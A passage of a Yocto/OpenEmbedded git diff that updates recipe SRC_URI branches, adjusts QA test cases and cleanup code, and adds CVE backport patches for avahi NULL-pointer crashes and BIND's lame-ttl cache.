-e "s: /usr/bin/perl: /usr/bin/env perl:g"
@@ -72,7 +72,7 @@ fi
# change all symlinks pointing to @SDKPATH@
for l in $($SUDO_EXEC find $native_sysroot -type l); do
- $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+ $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
if [ $? -ne 0 ]; then
echo "Failed to setup symlinks. Relocate script failed. Abort!"
exit 1
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index a84039f5855..2a8771dc28b 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -480,7 +480,8 @@ class ThreadedWorker(Thread):
try:
func(self, *args, **kargs)
except Exception as e:
- print(e)
+ # Eat all exceptions
+ bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
finally:
self.tasks.task_done()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b8..6c110d0656e 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
"expected_results": ""
},
"2": {
- "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
+ "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
"expected_results": " Qemu can be lauched normally."
},
"3": {
@@ -60,7 +60,7 @@
"expected_results": ""
},
"6": {
- "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
+ "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
"expected_results": ""
},
"7": {
@@ -247,7 +247,7 @@
"execution": {
"1": {
"action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
- "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
+ "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
},
"2": {
"action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64d..9566d9d10e5 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
"expected_results": ""
},
"3": {
- "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
+ "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
"expected_results": ""
},
"4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index e14322911d6..bd6537400e2 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
self.assertEqual(status, 0, msg=msg)
oldDate = output
- sampleDate = '"2016-08-09 10:00:00"'
- (status, output) = self.target.run("date -s %s" % sampleDate)
+ sampleTimestamp = 1488800000
+ (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
- (status, output) = self.target.run("date -R")
- p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
+ (status, output) = self.target.run('date +"%s"')
msg = 'The date was not set correctly, output: %s' % output
- self.assertTrue(p, msg=msg)
+ self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
(status, output) = self.target.run('date -s "%s"' % oldDate)
msg = 'Failed to reset date, output: %s' % output
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index 1bb04255218..01b633d89eb 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -90,6 +90,7 @@ qemux86_common = [
"glamor initialization failed",
"blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
"floppy: error",
+ 'failed to IDENTIFY (I/O error, err_mask=0x4)',
] + common_errors
ignore_errors = {
@@ -121,7 +122,7 @@ ignore_errors = {
'synth uevent: /devices/vio: failed to send uevent',
'PCI 0000:00 Cannot reserve Legacy IO [io 0x10000-0x10fff]',
] + common_errors,
- 'qemuarm' : [
+ 'qemuarmv5' : [
'mmci-pl18x: probe of fpga:05 failed with error -22',
'mmci-pl18x: probe of fpga:0b failed with error -22',
'Failed to load module "glx"',
@@ -135,6 +136,7 @@ ignore_errors = {
'OF: amba_device_add() failed (-19) for /amba/fpga/sci@a000',
'Failed to initialize \'/amba/timer@101e3000\': -22',
'jitterentropy: Initialization failed with host not compliant with requirements: 2',
+ 'clcd-pl11x: probe of 10120000.display failed with error -2',
] + common_errors,
'qemuarm64' : [
'Fatal server error:',
diff --git a/meta/lib/oeqa/runtime/cases/ptest.py b/meta/lib/oeqa/runtime/cases/ptest.py
index 0800f3c27f2..00742da2b52 100644
--- a/meta/lib/oeqa/runtime/cases/ptest.py
+++ b/meta/lib/oeqa/runtime/cases/ptest.py
@@ -57,7 +57,7 @@ class PtestRunnerTest(OERuntimeTestCase):
ptest_dirs = [ '/usr/lib' ]
if not libdir in ptest_dirs:
ptest_dirs.append(libdir)
- status, output = self.target.run('ptest-runner -d \"{}\"'.format(' '.join(ptest_dirs)), 0)
+ status, output = self.target.run('ptest-runner -t 450 -d \"{}\"'.format(' '.join(ptest_dirs)), 0)
os.makedirs(ptest_log_dir)
with open(ptest_runner_log, 'w') as f:
f.write(output)
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index 79390acc0dd..b932d5276bb 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -83,8 +83,10 @@ class BitbakeTests(OESelftestTestCase):
def test_force_task_1(self):
# test 1 from bug 5875
+ import uuid
test_recipe = 'zlib'
- test_data = "Microsoft Made No Profit From Anyone's Zunes Yo"
+ # Need to use uuid otherwise hash equivlance would change the workflow
+ test_data = "Microsoft Made No Profit From Anyone's Zunes Yo %s" % uuid.uuid1()
bb_vars = get_bb_vars(['D', 'PKGDEST', 'mandir'], test_recipe)
image_dir = bb_vars['D']
pkgsplit_dir = bb_vars['PKGDEST']
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index 3385546e8e0..66e326253ed 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -340,7 +340,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '0.1+git${SRCPV}'
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
checkvars['SRCREV'] = srcrev
checkvars['DEPENDS'] = set(['dbus'])
self._test_recipe_contents(recipefile, checkvars, [])
@@ -904,7 +904,7 @@ class DevtoolUpdateTests(DevtoolBase):
self._check_repo_status(os.path.dirname(recipefile), expected_status)
result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
- addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+ addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
srcurilines = src_uri.split()
srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
srcurilines.append('"')
diff --git a/meta/lib/oeqa/selftest/cases/fetch.py b/meta/lib/oeqa/selftest/cases/fetch.py
index cd15f651291..d2f0c38ef41 100644
--- a/meta/lib/oeqa/selftest/cases/fetch.py
+++ b/meta/lib/oeqa/selftest/cases/fetch.py
@@ -99,7 +99,7 @@ class Dependencies(OESelftestTestCase):
r = """
LICENSE="CLOSED"
- SRC_URI="git://example.com/repo"
+ SRC_URI="git://example.com/repo;branch=master"
"""
f = self.write_recipe(textwrap.dedent(r), tempdir)
d = tinfoil.parse_recipe_file(f)
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93a..cf8c92887b3 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
ptestsuite = "glibc-user" if ssh is None else "glibc"
self.ptest_section(ptestsuite)
- with open(os.path.join(builddir, "tests.sum"), "r") as f:
+ with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
for test, result in parse_values(f):
self.ptest_result(ptestsuite, test, result)
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 4fc3605f42f..c809d7c9b14 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
@classmethod
def tearDownClass(cls):
+ # Go creates file which are readonly
+ for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+ for filename in filenames + dirnames:
+ f = os.path.join(dirpath, filename)
+ if not os.path.islink(f):
+ os.chmod(f, 0o775)
shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
super(oeGoToolchainSelfTest, cls).tearDownClass()
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index 9d56e9e1e32..36214929986 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -357,7 +357,7 @@ class RecipetoolTests(RecipetoolBase):
tempsrc = os.path.join(self.tempdir, 'srctree')
os.makedirs(tempsrc)
recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
- srcuri = 'git://git.yoctoproject.org/libmatchbox'
+ srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
checkvars = {}
@@ -447,7 +447,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['Apache-2.0'])
- checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https'
+ checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
inherits = ['setuptools3']
self._test_recipe_contents(recipefile, checkvars, inherits)
@@ -514,7 +514,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['GPLv2'])
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
inherits = ['pkgconfig', 'autotools']
self._test_recipe_contents(recipefile, checkvars, inherits)
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489a..e2fe38be87b 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
os.makedirs(os.path.dirname(recipefile))
- srcuri = 'git://' + srcdir + ';protocol=file'
+ srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc1..dfb96618680 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
if not self.needclean:
return
self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index a0f17d557b2..d6d47cfabb4 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -235,7 +235,7 @@ class QemuRunner:
r = os.fdopen(r)
x = r.read()
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
- sys.exit(0)
+ os._exit(0)
self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca33..09738add1d9 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
self.d = d
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
tmpdir = self.d.getVar('WORKDIR')
if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
self._run('rm -rf %s' % self.targetdir)
subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
- pass
class TargetBuildProject(BuildProject):
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a736..e9dfa0770e7 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \
+SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
file://0001-remove-extra-decl.patch \
file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
"
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 5bf121ff6e1..fa1fe1ecdf1 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efivar.git \
+SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=master;protocol=https \
file://determinism.patch \
file://no-werror.patch"
SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.9.bb b/meta/recipes-bsp/opensbi/opensbi_0.9.bb
index cb1c3f2ebfd..e01491c9b7d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.9.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.9.bb
@@ -9,7 +9,7 @@ require opensbi-payloads.inc
inherit autotools-brokensep deploy
SRCREV = "234ed8e427f4d92903123199f6590d144e0d9351"
-SRC_URI = "git://github.com/riscv/opensbi.git;branch=master \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
"
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb9..8234b861627 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 993478a73ba..17c6140216c 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,7 +14,7 @@ PE = "1"
# repo during parse
SRCREV = "c4fddedc48f336eabc4ce3f74940e6aa372de18c"
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://git.denx.de/u-boot.git;branch=master \
file://0001-add-valid-fdt-check.patch \
file://CVE-2021-27097-1.patch \
file://CVE-2021-27097-2.patch \
diff --git a/meta/recipes-connectivity/avahi/avahi_0.8.bb b/meta/recipes-connectivity/avahi/avahi_0.8.bb
index a07cdbd03c2..69ac35ee07a 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.8.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.8.bb
@@ -25,6 +25,7 @@ SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}
file://initscript.patch \
file://0001-Fix-opening-etc-resolv.conf-error.patch \
file://handle-hup.patch \
+ file://local-ping.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/files/local-ping.patch b/meta/recipes-connectivity/avahi/files/local-ping.patch
new file mode 100644
index 00000000000..29c192d296e
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/local-ping.patch
@@ -0,0 +1,153 @@
+CVE: CVE-2021-36217
+CVE: CVE-2021-3502
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 9d31939e55280a733d930b15ac9e4dda4497680c Mon Sep 17 00:00:00 2001
+From: Tommi Rantala <tommi.t.rantala@nokia.com>
+Date: Mon, 8 Feb 2021 11:04:43 +0200
+Subject: [PATCH] Fix NULL pointer crashes from #175
+
+avahi-daemon is crashing when running "ping .local".
+The crash is due to failing assertion from NULL pointer.
+Add missing NULL pointer checks to fix it.
+
+Introduced in #175 - merge commit 8f75a045709a780c8cf92a6a21e9d35b593bdecd
+---
+ avahi-core/browse-dns-server.c | 5 ++++-
+ avahi-core/browse-domain.c | 5 ++++-
+ avahi-core/browse-service-type.c | 3 +++
+ avahi-core/browse-service.c | 3 +++
+ avahi-core/browse.c | 3 +++
+ avahi-core/resolve-address.c | 5 ++++-
+ avahi-core/resolve-host-name.c | 5 ++++-
+ avahi-core/resolve-service.c | 5 ++++-
+ 8 files changed, 29 insertions(+), 5 deletions(-)
+
+diff --git a/avahi-core/browse-dns-server.c b/avahi-core/browse-dns-server.c
+index 049752e9..c2d914fa 100644
+--- a/avahi-core/browse-dns-server.c
++++ b/avahi-core/browse-dns-server.c
+@@ -343,7 +343,10 @@ AvahiSDNSServerBrowser *avahi_s_dns_server_browser_new(
+ AvahiSDNSServerBrowser* b;
+
+ b = avahi_s_dns_server_browser_prepare(server, interface, protocol, domain, type, aprotocol, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_dns_server_browser_start(b);
+
+ return b;
+-}
+\ No newline at end of file
++}
+diff --git a/avahi-core/browse-domain.c b/avahi-core/browse-domain.c
+index f145d56a..06fa70c0 100644
+--- a/avahi-core/browse-domain.c
++++ b/avahi-core/browse-domain.c
+@@ -253,7 +253,10 @@ AvahiSDomainBrowser *avahi_s_domain_browser_new(
+ AvahiSDomainBrowser *b;
+
+ b = avahi_s_domain_browser_prepare(server, interface, protocol, domain, type, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_domain_browser_start(b);
+
+ return b;
+-}
+\ No newline at end of file
++}
+diff --git a/avahi-core/browse-service-type.c b/avahi-core/browse-service-type.c
+index fdd22dcd..b1fc7af8 100644
+--- a/avahi-core/browse-service-type.c
++++ b/avahi-core/browse-service-type.c
+@@ -171,6 +171,9 @@ AvahiSServiceTypeBrowser *avahi_s_service_type_browser_new(
+ AvahiSServiceTypeBrowser *b;
+
+ b = avahi_s_service_type_browser_prepare(server, interface, protocol, domain, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_service_type_browser_start(b);
+
+ return b;
+diff --git a/avahi-core/browse-service.c b/avahi-core/browse-service.c
+index 5531360c..63e0275a 100644
+--- a/avahi-core/browse-service.c
++++ b/avahi-core/browse-service.c
+@@ -184,6 +184,9 @@ AvahiSServiceBrowser *avahi_s_service_browser_new(
+ AvahiSServiceBrowser *b;
+
+ b = avahi_s_service_browser_prepare(server, interface, protocol, service_type, domain, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_service_browser_start(b);
+
+ return b;
+diff --git a/avahi-core/browse.c b/avahi-core/browse.c
+index 2941e579..e8a915e9 100644
+--- a/avahi-core/browse.c
++++ b/avahi-core/browse.c
+@@ -634,6 +634,9 @@ AvahiSRecordBrowser *avahi_s_record_browser_new(
+ AvahiSRecordBrowser *b;
+
+ b = avahi_s_record_browser_prepare(server, interface, protocol, key, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_record_browser_start_query(b);
+
+ return b;
+diff --git a/avahi-core/resolve-address.c b/avahi-core/resolve-address.c
+index ac0b29b1..e61dd242 100644
+--- a/avahi-core/resolve-address.c
++++ b/avahi-core/resolve-address.c
+@@ -286,7 +286,10 @@ AvahiSAddressResolver *avahi_s_address_resolver_new(
+ AvahiSAddressResolver *b;
+
+ b = avahi_s_address_resolver_prepare(server, interface, protocol, address, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_address_resolver_start(b);
+
+ return b;
+-}
+\ No newline at end of file
++}
+diff --git a/avahi-core/resolve-host-name.c b/avahi-core/resolve-host-name.c
+index 808b0e72..4e8e5973 100644
+--- a/avahi-core/resolve-host-name.c
++++ b/avahi-core/resolve-host-name.c
+@@ -318,7 +318,10 @@ AvahiSHostNameResolver *avahi_s_host_name_resolver_new(
+ AvahiSHostNameResolver *b;
+
+ b = avahi_s_host_name_resolver_prepare(server, interface, protocol, host_name, aprotocol, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_host_name_resolver_start(b);
+
+ return b;
+-}
+\ No newline at end of file
++}
+diff --git a/avahi-core/resolve-service.c b/avahi-core/resolve-service.c
+index 66bf3cae..43771763 100644
+--- a/avahi-core/resolve-service.c
++++ b/avahi-core/resolve-service.c
+@@ -519,7 +519,10 @@ AvahiSServiceResolver *avahi_s_service_resolver_new(
+ AvahiSServiceResolver *b;
+
+ b = avahi_s_service_resolver_prepare(server, interface, protocol, name, type, domain, aprotocol, flags, callback, userdata);
++ if (!b)
++ return NULL;
++
+ avahi_s_service_resolver_start(b);
+
+ return b;
+-}
+\ No newline at end of file
++}
diff --git a/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-1.patch b/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-1.patch
new file mode 100644
index 00000000000..f63c3332641
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-1.patch
@@ -0,0 +1,76 @@
+From 011e9418ce9bb25675de6ac8d47536efedeeb312 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Ond=C5=99ej=20Sur=C3=BD?= <ondrej@sury.org>
+Date: Fri, 24 Sep 2021 09:35:11 +0200
+Subject: [PATCH] Disable lame-ttl cache
+
+The lame-ttl cache is implemented in ADB as per-server locked
+linked-list "indexed" with <qname,qtype>. This list has to be walked
+every time there's a new query or new record added into the lame cache.
+Determined attacker can use this to degrade performance of the resolver.
+
+Resolver testing has shown that disabling the lame cache has little
+impact on the resolver performance and it's a minimal viable defense
+against this kind of attack.
+
+CVE: CVE-2021-25219
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/8fe18c0566c41228a568157287f5a44f96d37662]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bin/named/config.c | 2 +-
+ bin/named/server.c | 7 +++++--
+ doc/arm/reference.rst | 6 +++---
+ 3 files changed, 9 insertions(+), 6 deletions(-)
+
+diff --git a/bin/named/config.c b/bin/named/config.c
+index fa8473db7c..b6453b814e 100644
+--- a/bin/named/config.c
++++ b/bin/named/config.c
+@@ -151,7 +151,7 @@ options {\n\
+ fetches-per-server 0;\n\
+ fetches-per-zone 0;\n\
+ glue-cache yes;\n\
+- lame-ttl 600;\n"
++ lame-ttl 0;\n"
+ #ifdef HAVE_LMDB
+ " lmdb-mapsize 32M;\n"
+ #endif /* ifdef HAVE_LMDB */
+diff --git a/bin/named/server.c b/bin/named/server.c
+index 638703e8c2..35ad6a0b7f 100644
+--- a/bin/named/server.c
++++ b/bin/named/server.c
+@@ -4806,8 +4806,11 @@ configure_view(dns_view_t *view, dns_viewlist_t *viewlist, cfg_obj_t *config,
+ result = named_config_get(maps, "lame-ttl", &obj);
+ INSIST(result == ISC_R_SUCCESS);
+ lame_ttl = cfg_obj_asduration(obj);
+- if (lame_ttl > 1800) {
+- lame_ttl = 1800;
++ if (lame_ttl > 0) {
++ cfg_obj_log(obj, named_g_lctx, ISC_LOG_WARNING,
++ "disabling lame cache despite lame-ttl > 0 as it "
++ "may cause performance issues");
++ lame_ttl = 0;
+ }
+ dns_resolver_setlamettl(view->resolver, lame_ttl);
+
+diff --git a/doc/arm/reference.rst b/doc/arm/reference.rst
+index 3bc4439745..fea854f3d1 100644
+--- a/doc/arm/reference.rst
++++ b/doc/arm/reference.rst
+@@ -3358,9 +3358,9 @@ Tuning
+ ^^^^^^
+
+ ``lame-ttl``
+- This sets the number of seconds to cache a lame server indication. 0
+- disables caching. (This is **NOT** recommended.) The default is
+- ``600`` (10 minutes) and the maximum value is ``1800`` (30 minutes).
++ This is always set to 0. More information is available in the
++ `security advisory for CVE-2021-25219
++ <https://kb.isc.org/docs/cve-2021-25219>`_.
+
+ ``servfail-ttl``
+ This sets the number of seconds to cache a SERVFAIL response due to DNSSEC
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-2.patch b/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-2.patch
new file mode 100644
index 00000000000..1217f7f1864
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind-9.16.16/CVE-2021-25219-2.patch
@@ -0,0 +1,65 @@
+From 117cf776a7add27ac6d236b4062258da0d068486 Mon Sep 17 00:00:00 2001
